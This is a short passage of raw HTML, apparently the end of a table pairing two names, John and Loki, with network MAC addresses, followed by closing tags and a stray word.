<th>John</th><th>00:22:43:43:e7:7d</th><br />
<th>Loki</th><th>00:15:af:e7:64:03</th><br />
<br />
</table><br />
<br /></div>
Mstrunc